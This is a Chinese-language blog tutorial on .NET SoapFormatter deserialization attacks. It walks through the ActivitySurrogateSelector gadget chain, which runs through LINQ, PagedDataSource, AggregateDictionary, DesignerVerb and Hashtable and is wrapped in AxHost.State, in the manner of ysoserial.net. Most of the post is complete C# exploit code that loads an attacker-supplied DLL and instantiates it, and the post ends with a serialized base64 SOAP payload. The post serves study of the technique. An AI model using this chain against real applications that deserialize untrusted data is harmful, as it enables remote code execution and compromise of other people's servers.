February 26, 2024

【.NET 安全】ASP.NET SoapFormatter Deserialization 04

0-0 参考

https://github.com/Y4er/dotnet-deserialization/blob/main/SoapFormatter.md

0-1 ASP.NET 任意类加载

作为和Java高度相似的一门语言,涉及到类,那就肯定涉及到类加载的问题,而DOTNET里的类加载其实也是一样的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Reflection;

namespace DonNET_Deserialization;

public class TEST
{
public static void Main(string[] args)
{
var assembly = Assembly.Load(File.ReadAllBytes("ExpClassa.dll"));
var types = assembly.GetTypes();
Activator.CreateInstance(types[0]);
}
}

csharp里类编译后会变成dll文件,那么我们同样的也可以读取dll文件的字节流,通过Assembly.Load方法去加载,获取到的是一个assembly对象,通过gettypes获取dll内所有的类型,这里当然只有一个类型,然后通过Activator.CreateInstance实例化对象触发恶意方法
image.png
至此我们可以知道,Csharp里的链子形式其实都是类似的。

0-2 SoapFormatter

这东西其实不是今天的重点,因为他只是个序列化的模式,这一节讲的其实是其他几个链子。这里简单介绍一下他的模式。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Soap;
using System.Text;

namespace SoapDeserialization
{
[Serializable]
class Person
{
private int age;
private string name;

public int Age { get => age; set => age = value; }
public string Name { get => name; set => name = value; }
public void SayHello()
{
Console.WriteLine("hello from SayHello");
}
}
class Program
{
static void Main(string[] args)
{
SoapFormatter soapFormatter = new SoapFormatter();
Person person = new Person();
person.Age = 10;
person.Name = "jack";
using (MemoryStream stream = new MemoryStream())
{
soapFormatter.Serialize(stream,person);

string soap = Encoding.UTF8.GetString(stream.ToArray());
Console.WriteLine(soap);

stream.Position = 0;
Person p = (Person)soapFormatter.Deserialize(stream);
Console.WriteLine(p.Name);
p.SayHello();
}

Console.ReadKey();
}
}
}

它和BinaryFormatter其实一样,可以选择代理器,所以思路也几乎一样。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xm
lns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/enc
oding/">
<SOAP-ENV:Body>
<a1:Person id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/SoapDeserialization/DonNET%20Deserialization%2C%20Version%3D1.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyT
oken%3Dnull">
<age>10</age>
<name id="ref-3">jack</name>
</a1:Person>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

jack
hello from SayHello

输出结果如上,输出的格式又和XmlSerializer一样。

0-3 ActivitySurrogateSelector 攻击链

这一部分其实和Hessian反序列化很相似。在第一篇文章中,带大家了解了代理器的用法,代理器可以让一个不可序列化的类进行序列化,就和下面的Demo一样,但是你会意识到一个问题,就是他无法反序列化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Soap;

namespace SoapDeserialization
{
class Person
{
public string Name { get; set; }
public Person(string name)
{
Name = name;
}

public override string ToString()
{
return Name;
}
}

sealed class PersonSerializeSurrogate : ISerializationSurrogate
{

public void GetObjectData(Object obj, SerializationInfo info, StreamingContext context)
{
var p = (Person)obj;
info.AddValue("Name", p.Name);
}

public Object SetObjectData(Object obj, SerializationInfo info, StreamingContext context, ISurrogateSelector selector)
{
var p = (Person)obj;
p.Name = info.GetString("Name");
return p;
}
}

class Program
{
public static void Main(string[] args)
{
System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
SoapFormatter fmt = new SoapFormatter();
MemoryStream stm = new MemoryStream();

var ss = new SurrogateSelector();
ss.AddSurrogate(typeof(Person), new StreamingContext(StreamingContextStates.All), new PersonSerializeSurrogate());
fmt.SurrogateSelector = ss;
fmt.Serialize(stm, new Person("jack"));
stm.Position = 0;
Console.WriteLine(fmt.Deserialize(stm));

stm.Position = 0;
var fmt2 = new SoapFormatter();
Console.WriteLine(fmt2.Deserialize(stm));
Console.ReadKey();
}
}
}

image.png
但是今天说到的ActivitySurrogateSelector就不一样了,他可以序列化,也可以反序列化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Soap;

namespace SoapDeserialization
{
class NonSerializable
{
private string _text;

public NonSerializable(string text)
{
_text = text;
}

public override string ToString()
{
return _text;
}
}

// Custom serialization surrogate
class MySurrogateSelector : SurrogateSelector
{
public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector)
{
selector = this;
if (!type.IsSerializable)
{
Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
return (ISerializationSurrogate)Activator.CreateInstance(t);
}
return base.GetSurrogate(type, context, out selector);
}
}

class Program
{
public static void Main(string[] args)
{
System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
SoapFormatter fmt = new SoapFormatter();
MemoryStream stm = new MemoryStream();


fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, new NonSerializable("Hello World!"));
stm.Position = 0;

var fmt2 = new SoapFormatter();
Console.WriteLine(fmt2.Deserialize(stm));
Console.ReadKey();
}
}
}

image.png
成功的反序列化了,这是为什么呢?我们可以去分析一下,可以看到payload中有System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate这一段,其中ObjectSurrogate是关键。
这是它的一个内部类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
private sealed class ObjectSurrogate : ISerializationSurrogate
{
public void GetObjectData(object obj, SerializationInfo info, StreamingContext context)
{
if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck)
{
switch (obj)
{
case ActivityBind _:
case DependencyObject _:
break;
default:
throw new ArgumentException(nameof (obj));
}
}
info.AddValue("type", (object) obj.GetType());
string[] names = (string[]) null;
MemberInfo[] serializableMembers = FormatterServicesNoSerializableCheck.GetSerializableMembers(obj.GetType(), out names);
object[] objectData = FormatterServices.GetObjectData(obj, serializableMembers);
info.AddValue("memberDatas", (object) objectData);
info.SetType(typeof (ActivitySurrogateSelector.ObjectSurrogate.ObjectSerializedRef));
}

public object SetObjectData(
object obj,
SerializationInfo info,
StreamingContext context,
ISurrogateSelector selector)
{
return (object) null;
}

它做了一段处理info.SetType(typeof (ActivitySurrogateSelector.ObjectSurrogate.ObjectSerializedRef));它将我们序列化的类的属性设置为了ObjectSerializedRef,我们再看看这个类。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
[Serializable]
private sealed class ObjectSerializedRef : IObjectReference, IDeserializationCallback
{
private Type type;
private object[] memberDatas;
[NonSerialized]
private object returnedObject;

object IObjectReference.GetRealObject(StreamingContext context)
{
if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck && !typeof (ActivityBind).IsAssignableFrom(this.type) && !typeof (DependencyObject).IsAssignableFrom(this.type))
throw new ArgumentException(nameof (context));
if (this.returnedObject == null)
this.returnedObject = FormatterServices.GetUninitializedObject(this.type);
return this.returnedObject;
}

void IDeserializationCallback.OnDeserialization(object sender)
{
if (this.returnedObject == null)
return;
if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck && !typeof (ActivityBind).IsAssignableFrom(this.type) && !typeof (DependencyObject).IsAssignableFrom(this.type) && !(this.returnedObject is ActivityBind) && !(this.returnedObject is DependencyObject))
throw new ArgumentException("context");
string[] names = (string[]) null;
FormatterServices.PopulateObjectMembers(this.returnedObject, FormatterServicesNoSerializableCheck.GetSerializableMembers(this.type, out names), this.memberDatas);
this.returnedObject = (object) null;
}
}
}
}

它是一个可序列化的类,也就是说我们可以序列化并且反序列化一个本不可反序列化的类。所以说为啥和Hessian很像,那么既然如此,攻击面就可以扩大化了。

0-3.1 LINQ

什么是LINQ呢,LINQ是C#中一种类sql的查询语法。就简单的举个例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
public static void Main(string[] args)
{
var word = "hello from linq.";
var words = word.Split(' ');
var q1 = from s in words
where s.ToLower().Contains('o')
select s;
Console.WriteLine(q1);
foreach (var item in q1)
{
Console.WriteLine(item);
}
Console.ReadKey();
}
1
2
3
System.Linq.Enumerable+WhereArrayIterator`1[System.String]
hello
from

他会返回一个Enumerable迭代对象当做查询结果。并且LINQ有一个特性叫做延迟执行,也就是说当语句执行到
var q1 = from s in words where s.ToLower().Contains('o') select s;
这一步的时候,它并不会执行select语句,它需要被当做enumerable对象的时候会自动触发,也就是上述demo中的foreach (var item in q1)
结合上面说的攻击面扩大,我们可以反序列化LINQ对象进行命令执行,基本的触发链如下

1
2
3
4
5
6
7
8
9
10
11
12
13
public static void Main(string[] args)
{
List<byte[]> data = new List<byte[]>();
data.Add(File.ReadAllBytes("E:\\CTFLearning\\开发学习\\CsharpLearning\\ExpClassa\\ExpClassa\\obj\\Debug\\ExpClassa.dll"));
var e1 = data.Select(Assembly.Load);
Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance);
foreach (var o in e3)
{
Console.WriteLine(o);
}
}

他其实和Chaintransformer是一样的,一个链式调用,最终执行到CreateInstance里面实例化任意类,至于那个委托是因为方法需要反射获取。
image.png

0-3.2 调用链

ysoserial.net找到的调用链如下

1
2
3
IEnumerable -> PagedDataSource -> ICollection
ICollection -> AggregateDictionary -> IDictionary
IDictionary -> DesignerVerb -> ToString

最终是要到IEnumberable触发。我们一点点往上看
PagedDataSource
image.png
其中属性dataSource是IEnumerable类型,因此可以承接上终点的LINQ,又因为PagedDataSource是ICollection的子类,因此可以往上强转,最终到了AggregateDictionary
image.png
这里触发了Enumberable,并且可以看到它的构造方法传入了Icollection对象,我们把上面说到的PagedDataSource放进去就好了。
AggregateDictionary继承IDictionary,因此继续往上看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
public class DesignerVerb : MenuCommand
{
public DesignerVerb(string text, EventHandler handler)
: base(handler, StandardCommands.VerbFirst)
{
this.Properties[(object) nameof (Text)] = text == null ? (object) (string) null : (object) Regex.Replace(text, "\\(\\&.\\)", "");
}

public DesignerVerb(string text, EventHandler handler, CommandID startCommandID)
: base(handler, startCommandID)
{
this.Properties[(object) nameof (Text)] = text == null ? (object) (string) null : (object) Regex.Replace(text, "\\(\\&.\\)", "");
}

public string Description
{
get => (string) this.Properties[(object) nameof (Description)] ?? string.Empty;
set => this.Properties[(object) nameof (Description)] = (object) value;
}
public string Text => (string) this.Properties[(object) nameof (Text)] ?? string.Empty;
public override string ToString() => this.Text + " : " + base.ToString();
}
}

这里把一些重点方法拿出来了。可以看到ToString的地方配合上Text字段的getter方法可以接上AggregateDictionary,我们只需要将properties设置为AggregateDictionary即可。因此最终来到了如何触发ToString方法上,这里Ysoserial中使用的是HashTable。
image.png
Hashtable在反序列化的时候会重新建key集合。引发异常的话就会触发ToString,如图,如果2个键相同就会引发异常。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
using System;
using System.Collections.Generic;
using System.Linq;
using System.Collections;
using System.ComponentModel.Design;
using System.Data;
using System.IO;
using System.Reflection;
using System.Web.UI.WebControls;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Runtime.Serialization.Formatters.Soap;
using NDesk.Options;

namespace ysoserial.Generators
{
public class MySurrogateSelector : SurrogateSelector
{
public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector)
{
selector = this;
if (!type.IsSerializable)
{
Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
return (ISerializationSurrogate)Activator.CreateInstance(t);
}

return base.GetSurrogate(type, context, out selector);
}

}
[Serializable]
public class PayloadClass : ISerializable
{
protected byte[] assemblyBytes;
protected int variant_number = 1;
public PayloadClass()
{
this.assemblyBytes = File.ReadAllBytes("E:\\CTFLearning\\开发学习\\CsharpLearning\\ExpClassa\\ExpClassa\\obj\\Debug\\ExpClassa.dll");
}
private IEnumerable<TResult> CreateWhereSelectEnumerableIterator<TSource, TResult>(IEnumerable<TSource> src, Func<TSource, bool> predicate, Func<TSource, TResult> selector)
{
Type t = Assembly.Load("System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089")
.GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator`2")
.MakeGenericType(typeof(TSource), typeof(TResult));
return t.GetConstructors()[0].Invoke(new object[] { src, predicate, selector }) as IEnumerable<TResult>;
}
protected PayloadClass(SerializationInfo info, StreamingContext context)
{
}

public List<object> GadgetChains()
{
DesignerVerb verb = null;
Hashtable ht = null;
List<object> ls = null;
List<byte[]> data = new List<byte[]>();
data.Add(this.assemblyBytes);
var e1 = data.Select(Assembly.Load);
Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance);
PagedDataSource pds = new PagedDataSource() { DataSource = e3 };
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
verb = new DesignerVerb("", null);
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
ls = new List<object>();
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
ht = new Hashtable();
ht.Add(verb, "");
ht.Add("", "");
FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
Array keys = (Array)fi_keys.GetValue(ht);
FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance);
for (int i = 0; i < keys.Length; ++i)
{
object bucket = keys.GetValue(i);
object key = fi_key.GetValue(bucket);
if (key is string)
{
fi_key.SetValue(bucket, verb);
keys.SetValue(bucket, i);
break;
}
}

fi_keys.SetValue(ht, keys);

ls.Add(ht);

return ls;
}

public byte[] GadgetChainsToBinaryFormatter()
{
List<object> ls = GadgetChains();
MemoryStream stm = new MemoryStream();
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, ls);


return stm.ToArray();
}

public void GetObjectData(SerializationInfo info, StreamingContext context)
{
System.Diagnostics.Trace.WriteLine("In GetObjectData");
info.SetType(typeof(System.Windows.Forms.AxHost.State));
info.AddValue("PropertyBagBinary", GadgetChainsToBinaryFormatter());
}
}

public class Exp
{
public static void Main(string[] args)
{
System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

PayloadClass payload = new PayloadClass();
using (MemoryStream memoryStream = new MemoryStream(payload.GadgetChainsToBinaryFormatter()))
{
// 构建formatter
// SoapFormatter sp1 = new SoapFormatter();
// sp1.Serialize(memoryStream, payload);
memoryStream.Position = 0;
// var sp2=new SoapFormatter();
var bn=new BinaryFormatter();
bn.Deserialize(memoryStream);
}
}
}
}

image.png
虽然也可以弹窗,但是这个payload会报错,在实战中可能会导致利用失败,为了避免这种情况,ysoserial选择了一种二次反序列化的做法。

0-3.3 AxHost.State

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
protected State(SerializationInfo info, StreamingContext context)
{
SerializationInfoEnumerator enumerator = info.GetEnumerator();
if (enumerator == null)
return;
while (enumerator.MoveNext())
{
if (string.Compare(enumerator.Name, "Data", true, CultureInfo.InvariantCulture) == 0)
{
try
{
byte[] buffer = (byte[]) enumerator.Value;
if (buffer != null)
this.InitializeFromStream((Stream) new MemoryStream(buffer));
}
catch (Exception ex)
{
}
}
else if (string.Compare(enumerator.Name, "PropertyBagBinary", true, CultureInfo.InvariantCulture) == 0)
{
try
{
byte[] buffer = (byte[]) enumerator.Value;
if (buffer != null)
{
this.propBag = new AxHost.PropertyBagStream();
this.propBag.Read((Stream) new MemoryStream(buffer));
}
}
catch (Exception ex)
{
}
}
}
}

在反序列化的时候他会对PropertyBagBinary进行binary反序列化。
image.png
最主要的是这里还做了异常处理,就避免了异常发生。

0-3.4 最终Payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
using System;
using System.Collections.Generic;
using System.Linq;
using System.Collections;
using System.ComponentModel.Design;
using System.Data;
using System.IO;
using System.Reflection;
using System.Web.UI.WebControls;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Runtime.Serialization.Formatters.Soap;
using NDesk.Options;

namespace ysoserial.Generators
{
public class MySurrogateSelector : SurrogateSelector
{
public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector)
{
selector = this;
if (!type.IsSerializable)
{
Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
return (ISerializationSurrogate)Activator.CreateInstance(t);
}

return base.GetSurrogate(type, context, out selector);
}

}
[Serializable]
public class PayloadClass : ISerializable
{
protected byte[] assemblyBytes;
protected int variant_number = 1;
public PayloadClass()
{
this.assemblyBytes = File.ReadAllBytes("E:\\CTFLearning\\开发学习\\CsharpLearning\\ExpClassa\\ExpClassa\\obj\\Debug\\ExpClassa.dll");
}
private IEnumerable<TResult> CreateWhereSelectEnumerableIterator<TSource, TResult>(IEnumerable<TSource> src, Func<TSource, bool> predicate, Func<TSource, TResult> selector)
{
Type t = Assembly.Load("System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089")
.GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator`2")
.MakeGenericType(typeof(TSource), typeof(TResult));
return t.GetConstructors()[0].Invoke(new object[] { src, predicate, selector }) as IEnumerable<TResult>;
}
protected PayloadClass(SerializationInfo info, StreamingContext context)
{
}

public List<object> GadgetChains()
{
DesignerVerb verb = null;
Hashtable ht = null;
List<object> ls = null;
List<byte[]> data = new List<byte[]>();
data.Add(this.assemblyBytes);
var e1 = data.Select(Assembly.Load);
Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance);
PagedDataSource pds = new PagedDataSource() { DataSource = e3 };
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
verb = new DesignerVerb("", null);
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
ls = new List<object>();
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
ht = new Hashtable();
ht.Add(verb, "");
ht.Add("", "");
FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
Array keys = (Array)fi_keys.GetValue(ht);
FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance);
for (int i = 0; i < keys.Length; ++i)
{
object bucket = keys.GetValue(i);
object key = fi_key.GetValue(bucket);
if (key is string)
{
fi_key.SetValue(bucket, verb);
keys.SetValue(bucket, i);
break;
}
}

fi_keys.SetValue(ht, keys);

ls.Add(ht);

return ls;
}

public byte[] GadgetChainsToBinaryFormatter()
{
List<object> ls = GadgetChains();
MemoryStream stm = new MemoryStream();
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, ls);


return stm.ToArray();
}

public void GetObjectData(SerializationInfo info, StreamingContext context)
{
System.Diagnostics.Trace.WriteLine("In GetObjectData");
info.SetType(typeof(System.Windows.Forms.AxHost.State));
info.AddValue("PropertyBagBinary", GadgetChainsToBinaryFormatter());
}
}

public class Exp
{
public static void Main(string[] args)
{
System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

PayloadClass payload = new PayloadClass();
using (MemoryStream memoryStream = new MemoryStream())
{
//构建formatter
SoapFormatter sp1 = new SoapFormatter();
sp1.Serialize(memoryStream, payload);
memoryStream.Position = 0;
var sp2=new SoapFormatter();
// var bn=new BinaryFormatter();
sp2.Deserialize(memoryStream);
}
}
}
}

最终payload如上,经过了一层State包装就保证了不会报错。至此这条利用链就完成了

0-4 ActivitySurrogateSelectorFromFile

只是取这个名字而已,就是动态控制dll文件的内容,不难实现,ysoserial帮我们做好了。

0-5 小结

到这里可以发现其实和标题的Soap是没啥关系的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xm
lns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/enc
oding/">
<SOAP-ENV:Body>
<a1:AxHost_x002B_State id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Windows.Forms/System.Windows.Forms%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20P
ublicKeyToken%3Db77a5c561934e089">
<PropertyBagBinary href="#ref-3"/>
</a1:AxHost_x002B_State>
<SOAP-ENC:Array id="ref-3" xsi:type="SOAP-ENC:base64">AAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuM
C4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAABwAAAAcAAAAQAgAAAAgAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAA
CQgAAAAJCQAAAAoMCgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQMAAABqU3lzdGVtLldvcmtmbG9
3LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbG
l6YXRpb25Ib2xkZXIKAAAACQsAAAAJDAAAAAEEAAAAAwAAAAkNAAAACQ4AAAABBQAAAAMAAAAJDwAAAAkQAAAAAQYAAAADAAAACREAAAAJEgAAAAEHAAAAAwAAAAkTAAAACRQAAAABCAAAAAMAAAAJFQAAAAkWAAAABAkAAAAcU3lzdGVtL
kNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0
ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJFwAAAAkYAAAABAsAAAAfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgMAAAAERGF0YQlVbml0eVR5cGUMQXNzZW1ibHlOYW1lAQABCAYZAAA
A+AFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0TGlzdEl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNT
YxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGGgAAAE5TeXN0ZW0uQ
29yZSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQDAAAAAcAAAAJGwAAAAoJHAAAAAkdAAAACAgAAAAACggIAQAAAAENAAAACwAAAAYeAAAA+AFTeXN0ZW0uTGlu
cS5FbnVtZXJhYmxlKzxTZWxlY3RNYW55SXRlcmF0b3I+ZF9fMTdgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTV
jNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJGgAAABAOAAAACQAAAAgI/v///woICAEAAA
AKCQMAAAAKCSEAAAANAgEPAAAACwAAAAYiAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlP
W5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODld
